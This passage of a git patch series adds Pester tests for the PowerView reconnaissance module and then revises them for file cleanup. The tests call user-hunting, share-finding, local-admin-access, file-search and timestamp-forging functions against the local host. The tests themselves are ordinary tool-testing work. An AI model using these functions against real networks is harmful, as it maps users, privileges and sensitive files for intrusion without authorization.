+$LocalIP = (gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -match $IPregex}).ipaddress[0]
+
+
+########################################################
+#
+# PowerView functions.
+#
+########################################################
+
+Describe 'Export-PowerViewCSV' {
+    It 'Should Not Throw and should produce .csv output.' {
+        {Get-Process | Export-PowerViewCSV -OutFile process_test.csv} | Should Not Throw
+        '.\process_test.csv' | Should Exist
+        Remove-Item -Force .\process_test.csv        
+    }
+}
+
+
+Describe 'Set-MacAttribute' {
+    BeforeEach {
+        New-Item MacAttribute.test.txt -Type file
+    }
+    AfterEach {
+        Remove-Item -Force MacAttribute.test.txt
+    }
+    It 'Should clone MAC attributes of existing file' {
+        Set-MacAttribute -FilePath MacAttribute.test.txt -All '01/01/2000 12:00 am'
+        $File = (Get-Item MacAttribute.test.txt)
+        $Date = Get-Date -Date '2000-01-01 00:00:00'
+        
+        if ($File.LastWriteTime -ne $Date) {
+            Throw 'File LastWriteTime does Not match'
+        }
+        elseif($File.LastAccessTime -ne $Date) {
+            Throw 'File LastAccessTime does Not match'
+        }
+        elseif($File.CreationTime -ne $Date) {
+            Throw 'File CreationTime does Not match'
+        }
+    }
+}
+
+
+Describe 'Get-IPAddress' {
+    $IPregex = "(?<Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"
+    It 'Should return local IP address' {
+        if( $(Get-IPAddress) -notmatch $IPRegex ) {
+            Throw 'Invalid local IP address returned'
+        }
+    }
+    It 'Should accept -ComputerName argument' {
+        if( $(Get-IPAddress -ComputerName $env:COMPUTERNAME) -notmatch $IPRegex ) {
+            Throw 'Invalid -ComputerName IP address returned'
+        }
+    }
+}
+
+Describe 'Convert-SidToName' {
+    It 'Should resolve built in SIDs' {
+        Convert-SidToName -SID 'S-1-5-32-545' | Should Be 'BUILTIN\Users'
+    }
+    It 'Should accept pipeline input' {
+        'S-1-5-32-552' | Convert-SidToName | Should Be 'BUILTIN\Replicators'
+    }
+    It 'Should return a unresolvable SID' {
+        Convert-SidToName -SID 'S-1-5-32-1337' | Should Be 'S-1-5-32-1337'
+    }
+}
+
+
+Describe 'Get-Proxy' {
+    It 'Should Not Throw' {
+        {Get-Proxy} | Should Not Throw
+    }
+    It 'Should accept -ComputerName argument' {
+        {Get-Proxy -ComputerName $env:COMPUTERNAME} | Should Not Throw
+    }   
+}
+
+
+Describe 'Get-PathAcl' {
+    It 'Should Not Throw' {
+        {Get-PathAcl C:\} | Should Not Throw
+    }
+    It 'Should return correct ACLs' {
+        $Output = Get-PathAcl -Path C:\Windows | ?{$_.IdentityReference -eq "Creator Owner"}
+        if(-not $Output) {
+            Throw "Output Not returned"
+        }
+        if($Output.FileSystemRights -ne 'GenericAll') {
+            Throw "Incorrect FileSystemRights returned"
+        }
+    }
+}
+
+
+Describe 'Get-NameField' {
+    It 'Should extract dnshostname field from custom object' {
+        $Object = New-Object -TypeName PSObject -Property @{'dnshostname' = 'testing1'}
+        if ( (Get-NameField -Object $Object) -ne 'testing1') {
+            Throw "'dnshostname' field Not parsed correctly"
+        }
+    }
+    It 'Should extract name field from custom object' {
+        $Object = New-Object -TypeName PSObject -Property @{'name' = 'testing2'}
+        if ( (Get-NameField -Object $Object) -ne 'testing2') {
+            Throw "'name' field Not parsed correctly"
+        }
+    } 
+    It 'Should handle plaintext strings' {
+        if ( (Get-NameField -Object 'testing3') -ne 'testing3') {
+            Throw 'Plaintext string Not parsed correctly'
+        }
+    } 
+    It 'Should accept pipeline input' {
+        $Object = New-Object -TypeName PSObject -Property @{'dnshostname' = 'testing4'}
+        if ( ($Object | Get-NameField) -ne 'testing4') {
+            Throw 'Pipeline input Not processed correctly'
+        }
+    }
+}
+
+
+Describe 'Invoke-ThreadedFunction' {
+    It "Should allow threaded ping" {
+        $Hosts = ,"localhost" * 100
+        $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
+        $Hosts = Invoke-ThreadedFunction -NoImports -ComputerName $Hosts -ScriptBlock $Ping -Threads 20
+        if($Hosts.length -ne 100) {
+            Throw 'Error in using Invoke-ThreadedFunction to ping localhost'
+        }
+    }
+}
+
+
+Describe "Get-NetLocalGroup" {
+    It "Should return results for local machine administrators" {
+        if ( (Get-NetLocalGroup | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+    It "Should return results for listing local groups" {
+        if ( (Get-NetLocalGroup -ListGroups | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+    # TODO: -ComputerList
+    It "Should accept -GroupName argument" {
+        {Get-NetLocalGroup -GroupName "Remote Desktop Users"} | Should Not Throw
+    }
+    It "Should accept FQDN -ComputerName argument" {
+        if ( (Get-NetLocalGroup -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+    It "Should accept NETBIOS -ComputerName argument" {
+        if ( (Get-NetLocalGroup -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+    It "Should accept IP -ComputerName argument" {
+        if ( (Get-NetLocalGroup -ComputerName $LocalIP | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+    It "Should accept pipeline input" {
+        if ( ( "$env:computername.$env:userdnsdomain" | Get-NetLocalGroup | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+}
+
+
+Describe "Get-NetShare" {
+    It "Should return results for the local host" {
+        if ( (Get-NetShare | Measure-Object).count -lt 1) {
+            Throw "Incorrect share results returned"
+        }
+    }
+    It "Should accept FQDN -ComputerName argument" {
+        if ( (Get-NetShare -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+    It "Should accept NETBIOS -ComputerName argument" {
+        if ( (Get-NetShare -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+    It "Should accept IP -ComputerName argument" {
+        if ( (Get-NetShare -ComputerName $LocalIP | Measure-Object).count -lt 1) {
+            Throw "Incorrect share results returned"
+        }
+    }
+    It "Should accept pipeline input" {
+        if ( ( "$env:computername.$env:userdnsdomain" | Get-NetShare | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+}
+
+
+Describe "Get-NetLoggedon" {
+    It "Should return results for the local host" {
+        if ( (Get-NetLoggedon | Measure-Object).count -lt 1) {
+            Throw "Incorrect loggedon results returned"
+        }
+    }
+    It "Should accept FQDN -ComputerName argument" {
+        if ( (Get-NetLoggedon -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Incorrect loggedon results returned"
+        }        
+    }
+    It "Should accept NETBIOS -ComputerName argument" {
+        if ( (Get-NetLoggedon -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
+            Throw "Incorrect loggedon results returned"
+        }
+    }
+    It "Should accept IP -ComputerName argument" {
+        if ( (Get-NetLoggedon -ComputerName $LocalIP | Measure-Object).count -lt 1) {
+            Throw "Incorrect loggedon results returned"
+        }        
+    }
+    It "Should accept pipeline input" {
+        if ( ( "$env:computername.$env:userdnsdomain" | Get-NetLoggedon | Measure-Object).count -lt 1) {
+            Throw "Incorrect local administrators returned"
+        }
+    }
+}
+
+
+Describe "Get-NetSession" {
+    It "Should return results for the local host" {
+        if ( (Get-NetSession | Measure-Object).count -lt 1) {
+            Throw "Incorrect session results returned"
+        }
+    }
+    It "Should accept FQDN -ComputerName argument" {
+        if ( (Get-NetSession -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Incorrect session results returned"
+        }
+    }
+    It "Should accept NETBIOS -ComputerName argument" {
+        if ( (Get-NetSession -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
+            Throw "Incorrect session results returned"
+        }
+    }
+    It "Should accept IP -ComputerName argument" {
+        if ( (Get-NetSession -ComputerName $LocalIP | Measure-Object).count -lt 1) {
+            Throw "Incorrect session results returned"
+        }
+    }
+    It "Should accept the -UserName argument" {
+        {Get-NetSession -UserName 'Administrator'} | Should Not Throw
+    }
+    It "Should accept pipeline input" {
+        {"$env:computername.$env:userdnsdomain" | Get-NetSession} | Should Not Throw
+    }
+}
+
+
+Describe "Get-NetRDPSession" {
+    It "Should return results for the local host" {
+        if ( (Get-NetRDPSession | Measure-Object).count -lt 1) {
+            Throw "Incorrect session results returned"
+        }
+    }
+    It "Should accept FQDN -ComputerName argument" {
+        if ( (Get-NetRDPSession -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Incorrect session results returned"
+        }
+    }
+    It "Should accept NETBIOS -ComputerName argument" {
+        if ( (Get-NetRDPSession -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
+            Throw "Incorrect session results returned"
+        }
+    }
+    It "Should accept IP -ComputerName argument" {
+        if ( (Get-NetRDPSession -ComputerName $LocalIP | Measure-Object).count -lt 1) {
+            Throw "Incorrect session results returned"
+        }
+    }
+    It "Should accept pipeline input" {
+        {"$env:computername.$env:userdnsdomain" | Get-NetRDPSession} | Should Not Throw
+    }
+}
+
+
+Describe "Invoke-CheckLocalAdminAccess" {
+    It "Should Not Throw for localhost" {
+        {Invoke-CheckLocalAdminAccess} | Should Not Throw
+    }
+    It "Should accept FQDN -ComputerName argument" {
+        {Invoke-CheckLocalAdminAccess -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept NETBIOS -ComputerName argument" {
+        {Invoke-CheckLocalAdminAccess -ComputerName "$env:computername"} | Should Not Throw
+    }
+    It "Should accept IP -ComputerName argument" {
+        {Invoke-CheckLocalAdminAccess -ComputerName $LocalIP} | Should Not Throw
+    }
+    It "Should accept pipeline input" {
+        {"$env:computername.$env:userdnsdomain" | Invoke-CheckLocalAdminAccess} | Should Not Throw
+    }
+}
+
+
+Describe "Get-LastLoggedOn" {
+    It "Should return results for the local host" {
+        if ( (Get-LastLoggedOn | Measure-Object).count -lt 1) {
+            Throw "Incorrect loggedon results returned"
+        }
+    }
+    It "Should accept FQDN -ComputerName argument" {
+        if ( (Get-LastLoggedOn -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Incorrect loggedon results returned"
+        }
+    }
+    It "Should accept NETBIOS -ComputerName argument" {
+        if ( (Get-LastLoggedOn -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
+            Throw "Incorrect loggedon results returned"
+        }
+    }
+    It "Should accept IP -ComputerName argument" {
+        if ( (Get-LastLoggedOn -ComputerName $LocalIP | Measure-Object).count -lt 1) {
+            Throw "Incorrect loggedon results returned"
+        }
+    }
+    It "Should accept pipeline input" {
+        {"$env:computername.$env:userdnsdomain" | Get-LastLoggedOn} | Should Not Throw
+    }
+}
+
+
+Describe "Get-CachedRDPConnection" {
+    It "Should Not Throw" {
+        {Get-CachedRDPConnection} | Should Not Throw
+    }
+    It "Should accept FQDN -ComputerName argument" {
+        {Get-CachedRDPConnection -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept NETBIOS -ComputerName argument" {
+        {Get-CachedRDPConnection -ComputerName "$env:computername"} | Should Not Throw
+    }
+    It "Should accept IP -ComputerName argument" {
+        {Get-CachedRDPConnection -ComputerName $LocalIP} | Should Not Throw
+    }
+    It "Should accept pipeline input" {
+        {"$env:computername.$env:userdnsdomain" | Get-CachedRDPConnection} | Should Not Throw
+    }
+}
+
+
+Describe "Get-NetProcess" {
+    It "Should return results for the local host" {
+        if ( (Get-NetProcess | Measure-Object).count -lt 1) {
+            Throw "Incorrect process results returned"
+        }
+    }
+    It "Should accept FQDN -ComputerName argument" {
+        if ( (Get-NetProcess -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Incorrect process results returned"
+        }
+    }
+    It "Should accept NETBIOS -ComputerName argument" {
+        if ( (Get-NetProcess -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
+            Throw "Incorrect process results returned"
+        }
+    }
+    It "Should accept IP -ComputerName argument" {
+        if ( (Get-NetProcess -ComputerName $LocalIP | Measure-Object).count -lt 1) {
+            Throw "Incorrect process results returned"
+        }
+    }
+    # TODO: RemoteUserName/RemotePassword
+    It "Should accept pipeline input" {
+        {"$env:computername.$env:userdnsdomain" | Get-NetProcess} | Should Not Throw
+    }
+}
+
+
+Describe "Find-InterestingFile" {
+    #TODO: implement
+}
+
+
+Describe "Invoke-UserHunter" {
+    It "Should accept -ComputerName argument" {
+        if ( (Invoke-UserHunter -ShowAll -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -ComputerFile argument" {
+        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+        if ( (Invoke-UserHunter -ComputerFile ".\targets.txt" -ShowAll | Measure-Object).count -lt 1) {
+            Remove-Item -Force ".\targets.txt"
+            Throw "Insuffient results returned"
+        }
+        else {
+            Remove-Item -Force ".\targets.txt"
+        }
+    }
+    It "Should accept -NoPing flag" {
+        if ( (Invoke-UserHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -Delay and -Jitter arguments" {
+        if ( (Invoke-UserHunter -ShowAll -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain", "$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept pipeline input" {
+        if ( ("$env:computername.$env:userdnsdomain" | Invoke-UserHunter -ShowAll | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+}
+
+
+Describe "Invoke-StealthUserHunter" {
+    # simple test of the splatting
+    It "Should accept splatting for Invoke-UserHunter" {
+        {Invoke-StealthUserHunter -ShowAll -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+}
+
+
+Describe "Invoke-ProcessHunter" {
+    It "Should accept -ComputerName and -UserName arguments" {
+        if ( (Invoke-ProcessHunter -UserName $env:USERNAME -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -ComputerFile argument" {
+        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+        if ( (Invoke-ProcessHunter -ComputerFile ".\targets.txt" -UserName $env:USERNAME | Measure-Object).count -lt 1) {
+            Remove-Item -Force ".\targets.txt"
+            Throw "Insuffient results returned"
+        }
+        else {
+            Remove-Item -Force ".\targets.txt"
+        }
+    }
+    It "Should accept -ProcessName argument" {
+        if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -ProcessName powershell | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -UserFile argument" {
+        "$env:USERNAME" | Out-File -Encoding ASCII target_users.txt
+        if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserFile ".\target_users.txt" | Measure-Object).count -lt 1) {
+            Remove-Item -Force ".\target_users.txt"
+            Throw "Insuffient results returned"
+        }
+        else {
+            Remove-Item -Force ".\target_users.txt"
+        }
+    }
+    It "Should accept -NoPing flag" {
+        if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -Delay and -Jitter arguments" {
+        if ( (Invoke-ProcessHunter -UserName $env:USERNAME -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain", "$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept pipeline input" {
+        if ( ("$env:computername.$env:userdnsdomain" | Invoke-ProcessHunter -UserName $env:USERNAME | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+}
+
+
+Describe "Invoke-ShareFinder" {
+    It "Should accept -ComputerName argument" {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -ComputerFile argument" {
+        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+        if ( (Invoke-ShareFinder -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
+            Remove-Item -Force ".\targets.txt"
+            Throw "Insuffient results returned"
+        }
+        else {
+            Remove-Item -Force ".\targets.txt"
+        }
+    }
+    It "Should accept -ExcludeStandard argument" {
+        {Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -ExcludeStandard} | Should Not Throw
+    }
+    It "Should accept -ExcludePrint argument" {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -ExcludePrint | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -ExcludeIPC argument" {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -ExcludeIPC | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -CheckShareAccess argument" {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -CheckShareAccess | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -CheckAdmin argument" {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -CheckAdmin | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -NoPing argument" {
+        if ( (Invoke-ShareFinder -NoPing -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -Delay and -Jitter arguments" {
+        if ( (Invoke-ShareFinder -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain", "$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept pipeline input" {
+        if ( ("$env:computername.$env:userdnsdomain" | Invoke-ShareFinder | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+}
+
+
+Describe "Invoke-FileFinder" {
+    It "Should accept -ComputerName argument" {
+        {Invoke-FileFinder -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -ComputerFile argument" {
+        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt        
+        {Invoke-FileFinder -ComputerFile ".\targets.txt"} | Should Not Throw
+        Remove-Item -Force ".\targets.txt"
+    }
+    It "Should accept -ShareList argument" {
+        "\\$($env:computername)\\IPC$" | Out-File -Encoding ASCII shares.txt
+        {Invoke-FileFinder -ShareList ".\shares.txt"} | Should Not Throw
+        Remove-Item -Force ".\shares.txt"
+    }
+    It "Should accept -Terms argument" {
+        {Invoke-FileFinder -Terms secret,testing -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -OfficeDocs argument" {
+        {Invoke-FileFinder -OfficeDocs -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -FreshEXEs argument" {
+        {Invoke-FileFinder -FreshEXEs -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -LastAccessTime argument" {
+        {Invoke-FileFinder -LastAccessTime "01/01/2000" -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -LastWriteTime argument" {
+        {Invoke-FileFinder -LastWriteTime "01/01/2000" -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -ExcludeFolders argument" {
+        {Invoke-FileFinder -ExcludeFolders -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -ExcludeHidden argument" {
+        {Invoke-FileFinder -ExcludeHidden -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -CreationTime argument" {
+        {Invoke-FileFinder -CreationTime "01/01/2000" -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -OutFile argument" {
+        {Invoke-FileFinder -ComputerName "$env:computername.$env:userdnsdomain" -OutFile "found_files.csv"} | Should Not Throw
+        if(Test-Path -Path .\found_files.csv) {
+            $Null = Remove-Item -Force .\found_files.csv
+        }
+    }
+    It "Should accept -NoPing argument" {
+        {Invoke-FileFinder -NoPing -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+    }
+    It "Should accept -Delay and -Jitter arguments" {
+        {Invoke-FileFinder -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain")} | Should Not Throw
+    }
+    It "Should accept pipeline input" {
+        {"$env:computername.$env:userdnsdomain" | Invoke-FileFinder} | Should Not Throw
+    }
+}
+
+
+Describe "Find-LocalAdminAccess" {
+    It "Should accept -ComputerName argument" {
+        if ( (Find-LocalAdminAccess -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -ComputerFile argument" {
+        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+        if ( (Find-LocalAdminAccess -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
+            Remove-Item -Force ".\targets.txt"
+            Throw "Insuffient results returned"
+        }
+        else {
+            Remove-Item -Force ".\targets.txt"
+        }
+    }
+    It "Should accept -NoPing argument" {
+        if ( (Find-LocalAdminAccess -NoPing -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -Delay and -Jitter arguments" {
+        if ( (Find-LocalAdminAccess -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept pipeline input" {
+        if ( ("$env:computername.$env:userdnsdomain" | Find-LocalAdminAccess | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+}
+
+
+Describe "Invoke-EnumerateLocalAdmin" {
+    It "Should accept -ComputerName argument" {
+        if ( (Invoke-EnumerateLocalAdmin -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -ComputerFile argument" {
+        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+        if ( (Invoke-EnumerateLocalAdmin -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
+            Remove-Item -Force ".\targets.txt"
+            Throw "Insuffient results returned"
+        }
+        else {
+            Remove-Item -Force ".\targets.txt"
+        }
+    }
+    It "Should accept -NoPing argument" {
+        if ( (Invoke-EnumerateLocalAdmin -NoPing -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -Delay and -Jitter arguments" {
+        if ( (Invoke-EnumerateLocalAdmin -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+    It "Should accept -Outfile argument" {
+        Invoke-EnumerateLocalAdmin -ComputerName "$env:computername.$env:userdnsdomain" -OutFile "local_admins.csv"
+        ".\local_admins.csv" | Should Exist
+        Remove-Item -Force .\local_admins.csv
+    }
+    It "Should accept pipeline input" {
+        if ( ("$env:computername.$env:userdnsdomain" | Invoke-EnumerateLocalAdmin | Measure-Object).count -lt 1) {
+            Throw "Insuffient results returned"
+        }
+    }
+}
-- 
cgit v1.2.3


From a2353139966fa5747d37c8288f821ea841e947ce Mon Sep 17 00:00:00 2001
From: Harmj0y <will@harmj0y.net>
Date: Mon, 14 Dec 2015 17:34:12 -0500
Subject: Modified Tests/Recon.tests.ps1 to ensure file artifacts are not left
 on disk.

---
 Tests/Recon.tests.ps1 | 122 ++++++++++++++++++++++++++++----------------------
 1 file changed, 68 insertions(+), 54 deletions(-)

(limited to 'Tests')

diff --git a/Tests/Recon.tests.ps1 b/Tests/Recon.tests.ps1
index a1d539d..3e6679e 100644
--- a/Tests/Recon.tests.ps1
+++ b/Tests/Recon.tests.ps1
@@ -405,16 +405,17 @@ Describe "Invoke-UserHunter" {
             Throw "Insuffient results returned"
         }
     }
-    It "Should accept -ComputerFile argument" {
-        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
-        if ( (Invoke-UserHunter -ComputerFile ".\targets.txt" -ShowAll | Measure-Object).count -lt 1) {
-            Remove-Item -Force ".\targets.txt"
-            Throw "Insuffient results returned"
-        }
-        else {
-            Remove-Item -Force ".\targets.txt"
+    try {
+        It "Should accept -ComputerFile argument" {
+            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            if ( (Invoke-UserHunter -ComputerFile ".\targets.txt" -ShowAll | Measure-Object).count -lt 1) {
+                Throw "Insuffient results returned"
+            }
         }
     }
+    finally {
+        Remove-Item -Force ".\targets.txt"
+    }
     It "Should accept -NoPing flag" {
         if ( (Invoke-UserHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
@@ -447,31 +448,33 @@ Describe "Invoke-ProcessHunter" {
             Throw "Insuffient results returned"
         }
     }
-    It "Should accept -ComputerFile argument" {
-        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
-        if ( (Invoke-ProcessHunter -ComputerFile ".\targets.txt" -UserName $env:USERNAME | Measure-Object).count -lt 1) {
-            Remove-Item -Force ".\targets.txt"
-            Throw "Insuffient results returned"
-        }
-        else {
-            Remove-Item -Force ".\targets.txt"
+    try {
+        It "Should accept -ComputerFile argument" {
+            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            if ( (Invoke-ProcessHunter -ComputerFile ".\targets.txt" -UserName $env:USERNAME | Measure-Object).count -lt 1) {
+                Throw "Insuffient results returned"
+            }
         }
     }
+    finally {
+        Remove-Item -Force ".\targets.txt"
+    }
     It "Should accept -ProcessName argument" {
         if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -ProcessName powershell | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
-    It "Should accept -UserFile argument" {
-        "$env:USERNAME" | Out-File -Encoding ASCII target_users.txt
-        if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserFile ".\target_users.txt" | Measure-Object).count -lt 1) {
-            Remove-Item -Force ".\target_users.txt"
-            Throw "Insuffient results returned"
-        }
-        else {
-            Remove-Item -Force ".\target_users.txt"
+    try {
+        It "Should accept -UserFile argument" {
+            "$env:USERNAME" | Out-File -Encoding ASCII target_users.txt
+            if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserFile ".\target_users.txt" | Measure-Object).count -lt 1) {
+                Throw "Insuffient results returned"
+            }
         }
     }
+    finally {
+        Remove-Item -Force ".\target_users.txt"
+    }
     It "Should accept -NoPing flag" {
         if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
@@ -496,16 +499,17 @@ Describe "Invoke-ShareFinder" {
             Throw "Insuffient results returned"
         }
     }
-    It "Should accept -ComputerFile argument" {
-        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
-        if ( (Invoke-ShareFinder -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
-            Remove-Item -Force ".\targets.txt"
-            Throw "Insuffient results returned"
-        }
-        else {
-            Remove-Item -Force ".\targets.txt"
+    try {
+        It "Should accept -ComputerFile argument" {
+            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            if ( (Invoke-ShareFinder -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
+                Throw "Insuffient results returned"
+            }
         }
     }
+    finally {
+        Remove-Item -Force ".\targets.txt"
+    }
     It "Should accept -ExcludeStandard argument" {
         {Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -ExcludeStandard} | Should Not Throw
     }
@@ -551,14 +555,22 @@ Describe "Invoke-FileFinder" {
     It "Should accept -ComputerName argument" {
         {Invoke-FileFinder -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
     }
-    It "Should accept -ComputerFile argument" {
-        "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt        
